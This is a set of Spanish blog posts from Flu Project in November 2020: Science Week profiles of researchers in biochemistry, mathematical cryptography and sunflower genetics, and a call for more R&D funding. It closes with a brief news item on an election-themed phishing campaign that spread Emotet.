Recapitulando, hace casi 15 años que empecé mi andadura por la investigación biomédica. Soy Licenciada en Bioquímica por la Universidad Autónoma de Madrid. Mi primer contacto con la investigación propiamente dicha fue en 2006 cuando me incorporé a un laboratorio del departamento de Bioquímica de la Facultad de Medicina para la realización de mi Trabajo Fin de Licenciatura bajo la supervisión del profesor Antonio Cuadrado y la Dra. Ana I. Rojo. Yo tenía muy claro que quería realizar la Tesis Doctoral, así que, una vez terminada la Licenciatura, en este grupo de investigación me brindaron la oportunidad de continuar el proyecto. Unos meses después me concedieron una ayuda predoctoral, con lo que teníamos financiación asegurada para cubrir este período. Durante mi tesis además tuve la suerte de poder irme de estancia a Dundee (Escocia) y a París (Francia) para poder realizar diversos abordajes experimentales que de otra manera no hubiera podido desarrollar aquí. 

Así, llegó junio de 2012 y defendí mi Tesis Doctoral. Para mí, uno de los mayores hitos tanto profesionales como personales, porque, siendo honestos, la carrera científica requiere mucha dedicación, implicación, incluso mucho sufrimiento a veces, y es un momento en el que realmente crees que todo ha merecido la pena por llegar hasta ahí. Es un trabajo del que estoy sumamente orgullosa y en el que tengo claro que no estuve sola, sino que gracias a mis directores y a mis compañeros (a los que quiero muchísimo) que me apoyaron a todos los niveles, todo pudo llegar a buen puerto. Trabajamos mucho y llegó la recompensa, Doctora en Bioquímica, Biología Molecular y Biomedicina, con mención Europea y Premio Extraordinario.

Tras un breve periodo postdoctoral en este laboratorio, decidimos que era momento de cambiar de aires, había finalizado una etapa (¡8 años en total!) y tocaba emprender nuevos retos. No voy a negar que este punto fue complicado, pues no todo son alegrías en la carrera científica, y la inestabilidad a la que estamos sometidos los investigadores me hizo dudar de si realmente quería/podía seguir en ciencia o no, y en qué condiciones. Y en ese mar de dudas, surgió la oportunidad de continuar en el grupo de la Dra. Ángela M. Valverde (IIBm) trabajando en un proyecto cooperativo entre una compañía farmacéutica y su propio grupo. Decidí no desaprovecharla y seguir confiando en mi vocación científica. Creo que una de las características que nos definen a los investigadores, sobre todo en España, es la perseverancia. Un año después conseguí una ayuda postdoctoral Juan de la Cierva-Incorporación, ¡cuya duración es solamente de 2 años! Afortunadamente, en el grupo hemos ido consiguiendo financiación para ir sumando añitos de investigación para poder continuar con el estudio de nuevas dianas moleculares para el tratamiento de enfermedades hepáticas. De hecho, mi trabajo de estos últimos años ha sido reconocido con el Premio Margarita Lorenzo concedido por la Sociedad Española de Bioquímica y Biología Molecular y la fundación Lilly. Además, he podido hacer una parte del estudio en Marsella (Francia). Y es que una de las cosas buenas de la investigación es que te permite interactuar con muchos grupos nacionales e internacionales, por ejemplo, en cursos y congresos, y surgen colaboraciones ¡interesantísimas!


En mi carrera investigadora he trabajado en diversos campos (neurociencia, metabolismo...) con un nexo común que es el estudio de los mecanismos moleculares que subyacen en diferentes enfermedades crónicas como la enfermedad de Parkinson, Alzheimer o enfermedades metabólicas como la diabetes, la obesidad o la enfermedad de hígado graso no alcohólica. Partimos de la premisa de que sin conocer qué es lo que ocurre exactamente en una patología, el abordaje terapéutico se hace complicado. Para vencer al enemigo, hay que conocerlo de los pies a la cabeza. Por ello, mi proyecto versa sobre cómo modulando una familia de proteínas denominada Proteína Quinasa D podemos mejorar la sensibilidad a la insulina en el hígado, retrasando la progresión de las enfermedades metabólicas anteriormente mencionadas. Así una vez descrito este mecanismo molecular, podremos diseñar posibles fármacos para poder tratar estas enfermedades que a día de hoy son incurables. Aquí en este link tenéis un breve resumen de mi proyecto y con el que participo en el concurso #QueSigaLaCiencia promovido por @CIBER_ISCIII (si os gusta el vídeo, podéis ayudarme con un like y un RT para darle mayor difusión).

Como se vislumbra en mis palabras, la carrera investigadora es muy intensa, comprometida y sacrificada y se requiere de gran vocación y tolerancia a la frustración. No sólo vivimos pendientes de la incertidumbre de obtener resultados, de ser capaces de dar explicación a fenómenos aún desconocidos, sino que además vivimos pendientes de tener soporte económico y laboral para poder realizar nuestros proyectos de la manera más eficiente y rentable posible. Actualmente, la investigación en España busca beneficios a corto plazo soportada por investigadores trabajando en condiciones precarias, sin estabilidad ninguna, ni proyección de futuro, lo que perjudica seriamente la consecución de los proyectos así como la calidad e innovación de los mismos. Así que desde este altavoz que me ha brindado Flu-Project me gustaría hacer un llamamiento a la sociedad para que nos ayude a conseguir que al menos el 2 % del PIB vaya destinado a presupuesto científico. La ciencia de hoy mejorará la sociedad del futuro.

¡Muchas gracias a Flu-Project por dar voz a los investigadores en esta Semana de la Ciencia e Innovación 2020!

Leer más
      editar

6 nov 2020

#FluConLaCiencia: Maribel Glez. Vasco, Profesora e Investigadora en Criptografía Matemática

Por Juan Antonio Calles el 6 nov 2020 con 0 comentarios

Mi nombre es Maribel Glez. Vasco, y soy profesora e investigadora en Criptografía Matemática. Tras acabar mi licenciatura en Matemáticas en la U. de Oviedo, tuve la suerte de disfrutar de una beca Leonardo en Holanda, dentro de la división de Philips dedicada a la investigación en criptografía, Philips Crypto (hoy integrada en Philips Research). Esta oportunidad me permitió entender todo lo que las matemáticas podían hacer por los sistemas de comunicación seguros, todos los problemas que había por resolver y el papel fundamental que tenemos los matemáticos en el engranaje que va desde el teorema de seguridad hasta el producto final en el que el usuario confía.  De vuelta a Asturias, empecé mi doctorado en el grupo de Álgebra de la Facultad de Ciencias de Oviedo, bajo la dirección de la Dra. Consuelo Martínez López. Pude además  completar mi formación haciendo cursos de doctorado en la UPC (Barcelona) y en la U. de Cantabria, Santander. Gracias a una cierta obsesión por un problema de teoría combinatoria de grupos y su aplicación al cifrado de mensajes, entré en contacto con el  Instituto Europeo de Seguridad de Sistemas de la U. de Karlsruhe, en Alemania, donde pude disfrutar de varias estancias de investigación durante los años del doctorado. Ahí encontré mi lugar como pieza de un engranaje algo atípico que en aquel momento intentaba desentrañar la seguridad de varias herramientas criptográficas (de cifrado e intercambio de claves) que se construían a través de  problemas de reescritura en grupos no abelianos. La época del doctorado fue sin duda muy emocionante, donde no pasaba demasiado tiempo en el mismo sitio.  Tuve además la suerte de aprender con algunos de los mejores expertos en el área (como el profesor Igor Shparlinski o el (tristemente fallecido) profesor Thomas Beth, uno de los pioneros de la criptografía matemática en Europa. 

La criptografía es un área fascinante para cualquier matemático (y yo diría, para cualquier persona curiosa), no solo por la infinidad de problemas interesantes que plantea, sino por el ritmo frenético, la competitividad, la promiscuidad en temas y colaboraciones y el nivel de devoción que exige al investigador. Es un área además muy bien financiada (al menos en el ámbito internacional), al percibirse su incuestionable impacto social a corto plazo, si bien en nuestro país padece en gran medida la maldición que a menudo se cierne sobre las áreas multidisciplinares, que no acaban de encontrar su lugar en las casillas  “clásicas” definidas en muchos programas de financiación, evaluación y contratación.  

Tras terminar el doctorado en 2003 me incorporé a la Universidad Rey Juan Carlos, donde pertenezco al  Departamento MACIMTE que aglutina varias áreas de conocimiento (Matemática Aplicada, Ciencia e Ingeniería de los Materiales, Electromagnetismo, Estadística e Investigación Operativa y Tecnología Electrónica). Este cóctel de áreas y perfiles ha sido estimulante para mi trabajo, que en los últimos años se ha centrado en el área de los esquemas de intercambio de clave para entornos multiusuario. Con estos esquemas se posibilita que un grupo de entidades que sólo pueden comunicarse a través de canales no confiables puedan establecer conjuntamente una clave criptográfica útil, es decir, un valor con suficiente entropía (o impredictibilidad) para ser utilizado como “secreto conjunto” a la hora de, por ejemplo, cifrar las comunicaciones críticas entre los miembros del grupo. 

Uno de los proyectos que ahora mismo ocupan gran parte de mi tiempo es el de diseñar esquemas de este tipo que sean seguros (en algún sentido) frente a adversarios cuánticos. Es un proyecto llamado “Secure Communication in the Quantum Era”, que está financiado por el programa Science for Peace and Security de la OTAN (G5448). En él estamos involucrados cuatro grupos de distintos países (además de la U. Rey Juan Carlos, participan la U. de Malta, la Florida Atlantic University de E.E. U.U. y la U. Tecnológica de Eslovaquia). Hemos hecho dos vídeos de difusión donde podéis conocer algunos detalles del proyecto: uno con motivo de una reunión realizada en la U. Rey Juan Carlos y este otro que habla además de  un proyecto relacionado que está realizándose en la U. de Malta. 

Desde el grupo español que dirijo planteamos el diseño de una herramienta que utilice un intercambio seguro para dos usuarios como pieza básica para el diseño de un protocolo multiusuario. Todo ello con garantías frente a adversarios cuánticos, de modo que si el esquema dos parte de partida es seguro en este sentido (por ejemplo, un esquema clásico de los llamados post-cuánticos, o un esquema que use tecnología cuántica – de los llamados QKD) también lo será nuestro esquema multiusuario. Desde el punto de vista teórico es fascinante buscar la manera de formalizar los distintos tipos de actuación que es razonable asumir en adversarios cuánticos, ¿tienen acceso a computación cuántica con mayúsculas, sin restricciones?¿están limitados, por ejemplo, la memoria o el acceso a ciertas funciones con tecnología cuántica? ¿pueden interferir estos adversarios en la comunicación durante la ejecución del protocolo por parte de usuarios honestos? 


Centrándonos en la situación más realista (y útil a corto plazo) hemos diseñado un modelo de seguridad en el que trabajaremos bajo el paradigma llamado quantum-future. Informalmente, la idea es considerar que mientas el protocolo de establecimiento de clave se ejecuta no hay adversarios cuánticos, pudiendo éstos sin embargo aparecer y atacar la clave establecida en el futuro. De este modo, si una herramienta se demuestra segura en este marco podemos implementarla y utilizarla sin haber malgastado recursos o introducido cargas innecesarias en nuestros sistemas (que son inevitables si consideramos adversarios cuánticos omnipotentes que, por ejemplo, nos obliguen a utilizar sistemas de autenticación muy costosos computacionalmente).   Estamos convencidos de que este enfoque es útil a corto plazo y sirve para enfrentar de manera realista y eficiente la temida “amenaza cuántica” que tantos auguran letal para la criptografía actual. Sin lugar a dudas, el advenimiento de la computación cuántica no es sino otra oportunidad fascinante para el desarrollo de nuevas ideas y protocolos criptográficos aún más seguros y eficientes, capaces de dar respuestas a las necesidades de instituciones, empresas e individuos. 


Leer más
      editar

5 nov 2020

#FluConLaCiencia: José Fernández Martínez, Profesor de Investigación emérito en el Instituto de Agricultura Sostenible del CSIC en Córdoba

Por Juan Antonio Calles el 5 nov 2020 con 0 comentarios

Mi nombre es José Fernández Martínez y soy actualmente Profesor de Investigación emérito en el Instituto de Agricultura Sostenible del CSIC en Córdoba

Obtuve el título de Ingeniero Agrónomo en la Universidad de Madrid en 1970 y en 1972 conseguí una beca del Banco Mundial para realizar estudios en la Universidad de California, donde obtuve un Master en Agronomía y un doctorado en Genética. Soy asimismo Doctor Ingeniero Agrónomo por la Universidad de Córdoba. De 1975 a 1987 trabajé en el Instituto de Investigaciones Agrarias en Córdoba, donde desempeñé los cargos de Jefe de Departamento de plantas Oleaginosas y de Director del Centro de Investigación. En 1987 obtuve por concurso una plaza de Profesor de investigación en el Instituto de Agricultura Sostenible del CSIC en Córdoba, donde también desempeñe los cargos de Jefe de departamento de mejora genética Vegetal y de Director. 

He sido consultor de FAO en Marruecos, Egipto y Chipre y Consultor de la Unión Europea en China. He dirigido 12 tesis doctorales, soy autor de 130 artículos científicos en revistas de impacto, 114 comunicaciones en congresos, 30 capítulos de libros, 7 patentes internacionales y 32 registros de variedades vegetales. En los últimos 10 años, he participado en 12 proyectos de investigación y 15 contratos con empresas. En 2004 recibí el premio Pustovoit  de la asociación Internacional de girasol.

Pustovoit Award, Fargo/USA, 2004. Dr Gian Paolo Vannozzi/Italy, Dr José Fernández Martínez/Spain, Dr Felicity Vear/France & Dr Florin Stoenescu/USA

Pustovoit Award, Fargo/USA, 2004. Dr Gian Paolo Vannozzi/Italy, Dr José Fernández Martínez/Spain, Dr Felicity Vear/France & Dr Florin Stoenescu/USA

Durante mi vida profesional he desempeñado un papel significativo, durante más de 40 años, en la investigación en la mejora genética sobre diversos cultivos oleaginosos en España (girasol, Brassicas, cártamo, ricino), con importantes contribuciones en distintos  temas agronómicos y genéticos y moleculares. Un ejemplo sobresaliente  de estas contribuciones de mi trabajo de  investigación ha sido el desarrollo de nuevos tipos de aceite de girasol, dirigidos a aplicaciones específicas alimentarias y no alimentarias. Los principales componentes químicos que determinan las propiedades tecnológicas de los aceites son los ácidos grasos. Utilizando técnicas no transgénicas, como la mutagénesis artificial, participé en un trabajo pionero para el desarrollo de germoplasma de girasol, con alto contenido en los ácidos grasos oleico y ácido esteárico, que abarcó no solo la obtención de los mutantes y la caracterización genética y molecular de los genes implicados en la expresión de estos caracteres, sino su transferencia a fondos genéticos de alto rendimiento. El aceite de este material sirve de base para la industria alimentaria de margarinas y bollería que pueden sustituir a las grasas animales que tienen efectos negativos sobre la salud por su incidencia en el colesterol y evitar el proceso de hidrogenación por el que la grasa pasa de líquida a sólida. Este material fue patentado por el CSIC y está siendo explotado por varias empresas. 

Actualmente, la investigación científica en España se ha fijado como objetivo el 2% del PIB, lejos aún de los valores de 2018 (1,24 %) que a su vez es más bajo del porcentaje alcanzado en 2010 de 1,36, que bajó en sucesivos años hasta 1,19 % en 2016, y lejos de otros países europeos como Alemania (3,09 %), Suecia (3,34%), Francia (2,20%) y de otros países como Israel con 4,95 % y USA con 2,84 %. Pero la financiación no es  el único problema de la investigación que hay que mejorar. Hay otros problemas como el envejecimiento de la población investigadora, la burocratización, la falta de flexibilidad en la gestión, el cortoplacismo, la falta de coordinación entre investigación pública y privada entre otros. Esto hizo que en el período de expansión de 2010 se formaran becarios y que en los siguientes años, con la disminución del presupuesto, no existiesen suficientes becas postdoctorales y tuvieran que emigrar o dedicarse a otra cosa. Y a todo ello se une el problema de que aunque la producción científica ha sido aceptable, hay problemas en la transferencia e innovación a través de patentes y la falta de coordinación entre investigación pública y privada.

En definitiva, queda mucho por hacer, y alcanzar el 2% en ciencia debe de ser un objetivo para todos.

Un fuerte abrazo,

José Fernández Martínez
Leer más
      editar

4 nov 2020

#FluConLaCiencia: ¡Contaremos con 5 investigadores en la Semana de la Ciencia y la Investigación! ¿Nos acompañas?

Por Juan Antonio Calles el 4 nov 2020 con 0 comentarios

¡Buenas a todos! Como muchos ya sabréis, del 2 al 15 de noviembre de 2020 se celebra la Semana de la Ciencia y la Innovación. Son muchas las actividades que podréis disfrutar durante estas jornadas, y para saber más sobre todas ellas os recomendamos visitar los sitios web de las Comunidades Autónomas donde residáis, como por ejemplo, este enlace de la Comunidad de Madrideste del Gobierno de Canarias, o este de la Junta de Extremadura,  de las universidades de vuestro entorno, como este de la Universidad Complutense de Madrid, o de instituciones oficiales como el CSIC, o el CIEMAT

Si bien esta semana todos los años tiene gran importancia en el calendario de muchos profesionales que dedican su tiempo a divulgar y a presentarnos muchos de sus trabajos de una forma cercana y alcanzable, este año es especialmente clave por la situación tan complicada que vivimos, propiciada por la pandemia de la Covid-19, y que nos ha acercado más a la vida de tantos profesionales que dedican toda su carrera por y para la investigación con el principal fin de mejorar el bienestar de todos y de contribuir a nuestra evolución como sociedad. Por ellos, desde Flu Project hemos querido hacer un pequeño homenaje a toda la comunidad que hace ciencia desde España, invitando a 5 investigadores de disciplinas diferentes a la informática y a las telecomunicaciones (que estáis más habituados a leerlos en nuestro blog), para que nos hablen sobre su carrera profesional y nos presenten un proyecto que haya supuesto una contribución relevante para la sociedad.

Hacer ciencia a nivel público en España es realmente complicado. Actualmente, la inversión en nuestro país en I+D es de apenas el 1,24 % del PIB (frente a la media de los países comunitarios del 2,06 %, y el idílico objetivo de la UE del 3 %). Esto deriva en que gran parte de nuestra comunidad científica salga fuera de España, perdiendo la oportunidad de hacer carrera profesional cerca de sus familias y amigos, y, sin que "su éxito" revierta en el beneficio de la sociedad que ha contribuido con recursos públicos a su formación, lo que es más grave si cabe. También ocasiona que los investigadores que deciden hacer carrera en su país, tengan que preocuparse en obtener de forma constante financiación externa (pública y privada) para poder subsistir y, en muchas ocasiones, poner dinero propio para conseguir los recursos necesarios para finalizar sus investigaciones, lo que por desgracia les impide dedicar toda su capacidad a "producir ciencia" (disculpad que le de un lenguaje empresarial, defecto profesional, pero creo que describe claramente la importancia del problema).

Ya hay un compromiso del gobierno actual por duplicar la inversión en ciencia entre 2021 y 2027, y que esperamos de todo corazón que se materialice. Pero aún así, será poco si tenemos en cuenta el gran beneficio que supone a la sociedad. La ciencia da fruto a largo plazo, los trabajos de investigación llevan tiempo, requieren de muchas pruebas y obtener patentes o "productos viables" suele requerir largos plazos. Sin embargo, cuando uno de estos objetivos se ve cumplido, la sociedad obtiene beneficios mucho mayores de los invertidos, lo que ayuda también a paliar las pérdidas de aquellas investigaciones que por desgracia no den frutos.

Hay campañas muy positivas como la del 2 % de Constantes y Vitales. Yo no creo (opinión personal) que algunos millones de firmas ayuden a cambiar las cosas, pero sí creo que el ruido que generan ayuda a inculcar la importancia del problema en la sociedad, quien puede presionar como votantes a los políticos que nos gobiernan para que traten de cambiar las cosas, y no únicamente gobiernen pensando en los 4 años que estarán en el poder, sino para mejorar de verdad el futuro de todos. Recordad que la ciencia no da frutos a corto plazo, y no dará un rédito a nadie de forma inmediata. Y el ejemplo lo estamos analizando 24/7 en todos los medios de comunicación con la Covid-19. Hasta que una investigación acaba en una vacuna, y esta es probada en individuos, pueden pasar años. Y ni con todo el dinero del mundo, como está pasando en la actualidad, se ha conseguido reducir ese tiempo ni a 1 mes, ni a 1 año. Con suerte, lo reduciremos a la mitad, como está ocurriendo, y a un coste que en absoluto será proporcional. Un símil habitual en el mundo de la informática es que 9 mujeres no pueden tener un niño en 1 mes, y esa es la realidad. Por ello, toda la sociedad debemos entender lo que es la ciencia, y que sin ella, no hay evolución, no tendremos vacunas ni medicamentos para esas enfermedades hasta ahora incurables, no tendremos nueva tecnología que nos ayude a movernos o comunicarnos mejor, no descubriremos si hay vida en otros planetas, ni nos permitirá facilitarnos el aprendizaje de, por qué no, un nuevo idioma, ni nos ayudará a reducir o paliar el grave problema climático. Sin ciencia no hay futuro. Y esta semana trata precisamente sobre eso, de una fiesta, un momento bonito en el que la comunidad científica se esfuerza por enseñar sus trabajos de manera comprensible a la sociedad, para que vean dónde acaban la parte de sus impuestos que se dirige a ciencia.

Cuando hablamos de investigación solemos pensar en biomedicina o tecnología, pero no está de más recordar que la investigación engloba diversos campos de mucha relevancia para la sociedad, como son por ejemplo los siguientes:

  • Astronomía y Astrofísica
  • Bioinformática
  • Bioestadística
  • Biología Computacional
  • Biología
  • Bioquímica
  • Biotecnología
  • Ciencia e Ingeniería de Datos
  • Ciencia y Tecnología de los Alimentos
  • Ciencias Ambientales
  • Ciencias Biomédicas
  • Ciencias del Mar
  • Ciencias Experimentales
  • Ciencias Sociales
  • Enología
  • Estadística
  • Física
  • Genética
  • Geología
  • Matemáticas
  • Nanociencia y Nanotecnología
  • Química
Por ello, en esta semana de la ciencia en Flu Project hemos tratado de contactar con investigadores muy diferentes entre sí, con el objetivo de cubrir el mayor número posible de "ciencias" y experiencias. Sin más dilación, os presento a continuación a los investigadores invitados que nos acompañarán durante los próximos días, y que nos presentarán sus importantes trabajos:
  • Dr José Fernández Martínez, Profesor de Investigación emérito en el Instituto de Agricultura Sostenible del CSIC en Córdoba. 
  • Dra María Isabel González Vasco, Profesora e Investigadora en el campo de la Criptografía Matemática en la Universidad Rey Juan Carlos y en el Departamento de Ciencias Matemáticas del Charles E. Schmidt College of Science de la Florida Atlantic University.
  • Dra Patricia Rada Llano, Investigadora Postdoctoral en el Instituto de Investigaciones Biomédicas Alberto Sols (UAM/CSIC) y Ciberdem
  • Dr Mario Martín Gamboa, Profesor e Investigador Postdoctoral en Tecnologías Industriales en el campo de la Sostenibilidad de Sistemas y Productos.
  • Dra Juana Morillas Ruiz, Profesora e Investigadora en el Departamento de Tecnología de la Alimentación y Nutrición de la UCAM.
¡No os lo perdáis!

Un fuerte abrazo, ¡y que siga la ciencia!

Leer más
      editar

3 nov 2020

En época de elecciones, siempre alguien sale engañado

Por el 3 nov 2020 con 0 comentarios


 

Muy buena a todos. Sabemos que los malos aprovechan los grandes eventos que captan la atención de muchas personas para hacer de las suyas, y las elecciones estadounidenses no son la excepción. 

En los últimos días, investigadores de Proofpoint han detectado campañas que consisten en el envío de correos electrónicos con el asunto “Team Blue Take Action” a miles de usuarios y organizaciones en los que, simulando ser una iniciativa del Comité Nacional Demócrata, se les pedía que se anoten como voluntarios de la campaña presidencial. 

Los ciberdelincuentes, para hacer el ataque más creíble incluyeron en el cuerpo del mail fragmentos de texto extraídos del sitio oficial del organismo suplantado. Pero la verdadera sorpresa se encuentra en el archivo adjunto, ya que si el usuario abre el archivo y habilita las macros, se infectará con un conocido malware.
  

Captura del mensaje enviado

Se trata del famoso Emotet, del cuál ya hemos hablado anteriormente en nuestro blog. Si bien surgió hace varios años como un malware diseñado para interceptar el tráfico a Internet y de esta manera robar datos de cuentas bancarias en los equipos infectados, con el paso del tiempo sus versiones fueron evolucionando, haciendo más difícil su detección y sofisticando sus ataques, pudiendo incluso instalar otros tipos de malware en el equipo, como pueden ser Trickbot (recientemente desmantelado) o Ryuk.

Este tipo de campañas son consideradas como una grave amenaza, no sólo para los usuarios comunes, sino también para los gobiernos ya que muchas veces las oficinas y departamentos públicos son vulnerables a estos ataques al contar con tecnologías antiguas o desactualizadas y una gran carencia en capacitación y concientización de los empleados. Es tan fácil como abusar de la confianza o tomar desprevenido a un usuario para efectivizar el ataque y que el malware comience a propagarse realizando movimientos laterales por toda la red.
 
La batalla final
Para terminar, sólo queda recordarles que hoy es el día de las elecciones que acapara todas las miradas, y que nos ha dejado una campaña y algunos debates un tanto atípicos, y por supuesto una enorme cantidad de memes.
 
¡Hasta el próximo post!
Leer más
      editar
< >